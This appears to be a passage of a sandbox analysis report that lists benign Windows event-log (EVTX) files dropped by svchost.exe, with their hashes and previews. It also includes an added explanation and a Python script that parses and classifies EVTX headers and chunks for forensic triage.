Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.....................................................................................................................|.~2ElfChnk.....................................hi..hl...M.......................................................................KQ................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.441475404183629
Encrypted:false
SSDEEP:768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
MD5:B7F318BB9FA336235CCBE5A391775D8E
SHA1:F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
SHA-256:D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
SHA-512:1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):3.4699263306571524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
                                                                                                                                                                                                                                              MD5:86173450A7EE15BC5B6A2C667DD3B040
                                                                                                                                                                                                                                              SHA1:200635B7FB3137AB9A33A6551182F4BA05BDCE84
                                                                                                                                                                                                                                              SHA-256:AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
                                                                                                                                                                                                                                              SHA-512:3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.450965793914843
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
                                                                                                                                                                                                                                              MD5:3914FD52494E203A25B69F9F4221031F
                                                                                                                                                                                                                                              SHA1:8046E0D1C78A47632A4550AC66FC9917E6429457
                                                                                                                                                                                                                                              SHA-256:D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
                                                                                                                                                                                                                                              SHA-512:12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.1568075545974956
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
                                                                                                                                                                                                                                              MD5:F3CF496665845DA6C957242770973ECE
                                                                                                                                                                                                                                              SHA1:BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
                                                                                                                                                                                                                                              SHA-256:BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
                                                                                                                                                                                                                                              SHA-512:EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.8853799397148268
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
                                                                                                                                                                                                                                              MD5:FACBCFA717058EFCED1754221D6A421D
                                                                                                                                                                                                                                              SHA1:1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
                                                                                                                                                                                                                                              SHA-256:6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
                                                                                                                                                                                                                                              SHA-512:0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 372, DIRTY
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):62624
                                                                                                                                                                                                                                              Entropy (8bit):5.680704859148489
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:N2ehna5gzuzNz0zxzuewKWMK/a5kWcra5Ae0a5c9IzIzyzkma5Opa5GPia5L9Xzr:MeHcW+EzJxFNPrMFZEoGJC3Ep9d
                                                                                                                                                                                                                                              MD5:4BAB79FF67BBE6303D9A7F4FEDFBD297
                                                                                                                                                                                                                                              SHA1:3E9498B5730704BE01D9AB24BE63ED3D978345D5
                                                                                                                                                                                                                                              SHA-256:261C77C86D2B54606F7B0CC9F4147D3A3D7CB3540E2C67444297DEB7373E2687
                                                                                                                                                                                                                                              SHA-512:507A6F72DC4563C613841C14ED4B91CE15EC4521109DFE51CE6E76A811BF7DFC44B0DB264BE21CE75204BDF79B4EDB17D69B0EFB8E9FC49086208EC47218686B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfFile.................t...................................................................................................S{f.ElfChnk.r.......y.......r.......y............8..x>...Q.6....................................................................m...........................................@...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&................................-..............................................**......r..........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
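Every 65536-byte blob above whose preview begins with "ElfChnk" is a raw Windows event log (EVTX) chunk written out by the event log service host (svchost.exe), and the 62624-byte blob beginning with "ElfFile" carries the EVTX file header that libmagic reports as "MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 372, DIRTY". The earlier "DIY-Thermocam raw data (Lepton 3.x)" label is a libmagic byte-pattern mismatch on one of those same chunks (its preview also starts with "ElfChnk"), which is why triage of dropped files should classify by the documented EVTX header layout and verify the header checksums rather than trust the file-type string. The following is an added example, not code from the Joe Sandbox report: it parses the ElfFile header (chunk count, last chunk in use, next record id, DIRTY flag), walks an ElfChnk chunk's records (magic 2A 2A 00 00, record id, FILETIME), checks the CRC32s, and labels a blob as an EVTX file, a bare EVTX chunk, or unknown. The sample bytes are constructed by the builder functions; the record payloads are opaque placeholders standing in for BinXml, which this example does not decode.

```python
"""Classify Windows EVTX artefacts (file headers, stand-alone chunks) by structure.

Added example, not part of the sandbox report. Layout follows the documented
EVTX format: a 4 KiB "ElfFile\\0" header, then 64 KiB "ElfChnk\\0" chunks whose
records start with 2A 2A 00 00. All sample bytes below are constructed.
"""
import struct
import zlib
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

FILE_MAGIC, CHUNK_MAGIC, RECORD_MAGIC = b"ElfFile\x00", b"ElfChnk\x00", b"\x2a\x2a\x00\x00"
CHUNK_SIZE, FILE_HDR_SIZE = 0x10000, 0x1000
FLAG_DIRTY, FLAG_FULL = 0x1, 0x2


def crc32(b: bytes) -> int:
    return zlib.crc32(b) & 0xFFFFFFFF


def filetime(ft: int) -> datetime:
    # FILETIME: 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


@dataclass
class Record:
    record_id: int
    written: datetime
    size: int
    intact: bool          # trailing size copy matches the leading size field


@dataclass
class ChunkInfo:
    first_id: int
    last_id: int
    header_crc_ok: bool   # CRC32 over bytes 0..120 and 128..512 (checksum field skipped)
    records_crc_ok: bool  # CRC32 over the record area, bytes 512..free_space_offset
    records: list = field(default_factory=list)


@dataclass
class FileInfo:
    chunk_count: int
    last_chunk: int
    next_record_id: int
    dirty: bool
    header_crc_ok: bool   # CRC32 over the first 120 header bytes


def parse_chunk(chunk: bytes) -> ChunkInfo:
    if len(chunk) != CHUNK_SIZE or chunk[:8] != CHUNK_MAGIC:
        raise ValueError("not an EVTX chunk")
    (_first_no, _last_no, first_id, last_id, _hdr_size, _last_off,
     free_off, rec_crc) = struct.unpack_from("<QQQQIIII", chunk, 8)
    hdr_crc = struct.unpack_from("<I", chunk, 124)[0]
    info = ChunkInfo(first_id, last_id,
                     crc32(chunk[:120] + chunk[128:512]) == hdr_crc,
                     crc32(chunk[512:free_off]) == rec_crc)
    off = 512
    while off + 28 <= free_off and chunk[off:off + 4] == RECORD_MAGIC:
        size, rec_id, ts = struct.unpack_from("<IQQ", chunk, off + 4)
        if size < 28 or off + size > free_off:
            break             # truncated or corrupt record: stop walking, keep what parsed
        size_copy = struct.unpack_from("<I", chunk, off + size - 4)[0]
        info.records.append(Record(rec_id, filetime(ts), size, size_copy == size))
        off += size
    return info


def parse_file_header(buf: bytes) -> FileInfo:
    if len(buf) < FILE_HDR_SIZE or buf[:8] != FILE_MAGIC:
        raise ValueError("not an EVTX file")
    _first_chunk, last_chunk, next_id = struct.unpack_from("<QQQ", buf, 8)
    n_chunks = struct.unpack_from("<H", buf, 42)[0]
    flags, crc = struct.unpack_from("<II", buf, 120)
    return FileInfo(n_chunks, last_chunk, next_id, bool(flags & FLAG_DIRTY),
                    crc32(buf[:120]) == crc)


def classify(blob: bytes) -> str:
    """Label a dropped blob by its EVTX header, independent of libmagic's guess."""
    if blob[:8] == FILE_MAGIC and len(blob) >= FILE_HDR_SIZE:
        return "evtx-file"
    if blob[:8] == CHUNK_MAGIC and len(blob) == CHUNK_SIZE:
        return "evtx-chunk"  # a bare 64 KiB chunk with no ElfFile header in front
    return "unknown"


# --- constructed sample data (not from the analysed sample) -------------------
SAMPLE_FT = 132_000_000_000_000_000   # constructed FILETIME, April 2019


def build_chunk(first_id: int, payloads: list) -> bytes:
    """Build one chunk with consistent checksums; payloads stand in for BinXml."""
    chunk = bytearray(CHUNK_SIZE)
    off, last_off = 512, 512
    for i, payload in enumerate(payloads):
        size = 28 + len(payload)   # magic(4) size(4) id(8) time(8) payload size-copy(4)
        rec = (RECORD_MAGIC + struct.pack("<IQQ", size, first_id + i, SAMPLE_FT)
               + payload + struct.pack("<I", size))
        chunk[off:off + size] = rec
        last_off, off = off, off + size
    n = len(payloads)
    struct.pack_into("<8sQQQQIIII", chunk, 0, CHUNK_MAGIC, 0, n - 1, first_id,
                     first_id + n - 1, 128, last_off, off, crc32(bytes(chunk[512:off])))
    struct.pack_into("<I", chunk, 124, crc32(bytes(chunk[:120]) + bytes(chunk[128:512])))
    return bytes(chunk)


def build_file(chunks: list, next_id: int, dirty: bool = True) -> bytes:
    hdr = bytearray(FILE_HDR_SIZE)
    struct.pack_into("<8sQQQIHHHH", hdr, 0, FILE_MAGIC, 0, len(chunks) - 1, next_id,
                     128, 1, 3, FILE_HDR_SIZE, len(chunks))
    struct.pack_into("<II", hdr, 120, FLAG_DIRTY if dirty else 0, 0)
    struct.pack_into("<I", hdr, 124, crc32(bytes(hdr[:120])))
    return bytes(hdr) + b"".join(chunks)


if __name__ == "__main__":
    chunk = build_chunk(370, [b"<Event/>" * 4, b"<Event/>" * 6])
    print(classify(chunk), parse_chunk(chunk))
    print(classify(build_file([chunk], next_id=372)), parse_file_header(build_file([chunk], 372)))
```

Run against the real dropped files, `classify` turns the "DIY-Thermocam" and "data" entries into "evtx-chunk" and the "ElfFile" entry into "evtx-file"; a chunk whose record-area CRC fails while its header CRC holds is the signature of records modified in place, which is worth flagging separately from a chunk that is merely not yet flushed (the DIRTY flag on the file header only says the log was open when the copy was taken).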
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):1.0596696487276978
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
                                                                                                                                                                                                                                              MD5:F6D375E51341AC949A73803CF00B96E6
                                                                                                                                                                                                                                              SHA1:5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
                                                                                                                                                                                                                                              SHA-256:EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
                                                                                                                                                                                                                                              SHA-512:1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.241268628600426
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
                                                                                                                                                                                                                                              MD5:602FD635C1BE2C0F087784BAE052554B
                                                                                                                                                                                                                                              SHA1:77EE62511C78BA6989DF77AC6B616422A44D7F54
                                                                                                                                                                                                                                              SHA-256:78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
                                                                                                                                                                                                                                              SHA-512:8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):128208
Entropy (8bit):3.6957707566714455
Encrypted:false
SSDEEP:384:26IDxhIEIjIUIoIhNIDIkgIpNITbIxvIIyI6IEIRIUIVIEIQImIuWhDIEQAGxIHE:2/KWWZxGkilhKNWZxGkilhKf
MD5:EF52C86BD67254C41CA1559308ED051C
SHA1:FCA8FB5E149FB0658A3B00C4670C17B90C7A567B
SHA-256:E6B6FB49A6374842698B7728851F05559E4721EB8E8E89E5E2F4C0FC65ECEEF7
SHA-512:53E115D4E9546D54A408BCC53298825880AC82A6EDFAADB4DB36BF225F1DF91DC3D590A1BF2D93D9E0E9CCFDEEF350659EC0E274009DFE9103523017785E2572
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8023807109333921
Encrypted:false
SSDEEP:384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
MD5:996D00E5A8B66706691FE697CCD68A7A
SHA1:C90C99232451BAF2DCEB02C56C69CA9194390A9D
SHA-256:95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
SHA-512:FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):2.999253421723821
Encrypted:false
SSDEEP:768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
MD5:11CAFE60067FAE9C5A304C7A7DAC0EB5
SHA1:0E72987588CB8557C7CD00AD3D8956CDC0593C35
SHA-256:1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
SHA-512:764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.434419120849508
Encrypted:false
SSDEEP:768:Coj+1jN2RkG6OQFAWAbYgO0TKLyqHvaCmkyGU:Ci+y4AVKLyqHukyGU
MD5:305B158F7163EB6D1E093A059DED207B
SHA1:6B56D0D843EEEB0804AD648F7888CD25EC5D8DF7
SHA-256:849D09E8541C4C51D8A81461E060A642E570F0A3E93CCE4820E03B91CC125F26
SHA-512:2198E2701B77F09B8B86D45BD033A1DC2366D30861C0AE0F19E045DAD26F1ECB577865F2F8ACD9395562C43914DEFAAD03B0AA9D8733676E6E1018F8DEE18EF7
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.7602204514023913
Encrypted:false
SSDEEP:384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
MD5:A71D2A716E4B8C87379C50F91A376243
SHA1:B55D17BCD95C285812D918E820EDC513B8BC4373
SHA-256:4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
SHA-512:4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):3.777787992757215
Encrypted:false
SSDEEP:1536:9XhSUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:9XonS
MD5:E6FF7A295152A36E7A222547BF78A53E
SHA1:F50EEB5B1479494B8E1E932F8825715ECB99CD26
SHA-256:F1D9EA9F88F9D1A614750D11EBC2BC9278F8ABB2DD8D28ECE3998D0D13C12ADC
SHA-512:3BC89C8ECBC8F5F8557C0C41E3F15BD0F6F9753DD46BA2C878133EE6AF88EEF7335773FCF0649FF1D457BD697FC87CA88859C08D3C29450D50F2365B11655FD7
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):2.4655200384785823
Encrypted:false
SSDEEP:768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
MD5:EC1441AF347A3AEBD3C499EB77112044
SHA1:062F0645AF0FF401308A0582362E6FE001C5444F
SHA-256:97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
SHA-512:687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):86488
Entropy (8bit):2.2476118306014543
Encrypted:false
SSDEEP:384:lhNiwCrtrlXbaDQX/5pbiN5p6iN5yYXiN5pZiN5pIiN5pLiN5pZDiN5p+iN5yYTr:l6A6EV
MD5:B05A4EAB64EA7342B26E8328102FA68A
SHA1:1C0267DB4EF9F39A640E227723773547112FB232
SHA-256:B58AEBD6EA0869E93FB7B1489F648A3F8631DC7DA5D0692DB59370DCE6C690FA
SHA-512:ACE2CE5945F613582D09B15907F4DDABB2348E4BCA409DA3F81A9DA69A210931E53197DD3EA9708E023239F3E3666A4C6C9E45E5D11026049A8800D286BDCB83
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.335307911754908
Encrypted:false
SSDEEP:384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
MD5:DEC13E419235D71E66C768AF61C819EB
SHA1:C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
SHA-256:E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
SHA-512:A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.470554172113501
Encrypted:false
SSDEEP:1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
MD5:7C2BA3824E6FDFDC9B34997831CF5BA4
SHA1:2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
SHA-256:902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
SHA-512:4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):70808
Entropy (8bit):4.472924735663251
Encrypted:false
SSDEEP:1536:onXV0TICymdzj+j9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizg:onXVUICymdzj+j9GvEkeLhw6IrKOu4z0
MD5:25D1597DE9A01526EC4658342283998A
SHA1:87BA0EC37178FA40247A5FB5E00AE03A36486DE9
SHA-256:656F9367917ABB180227C8DB8137B6DF16B8553FAAA0778A658FE5C3A522D8A3
SHA-512:0E19DD07AB470357F275ADA42AD34712CA25A7F37528199C5E0E4471B350DD81BCE1741F2A34F9C5747D1F4901A35A92A608F648FFC04B47E52CDF9D9B832329
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):2.5283250731919766
Encrypted:false
SSDEEP:384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
MD5:9CB77B06F0F33B4BC7A638085998A032
SHA1:04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
SHA-256:AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
SHA-512:488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):2.268440759929627
Encrypted:false
SSDEEP:384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
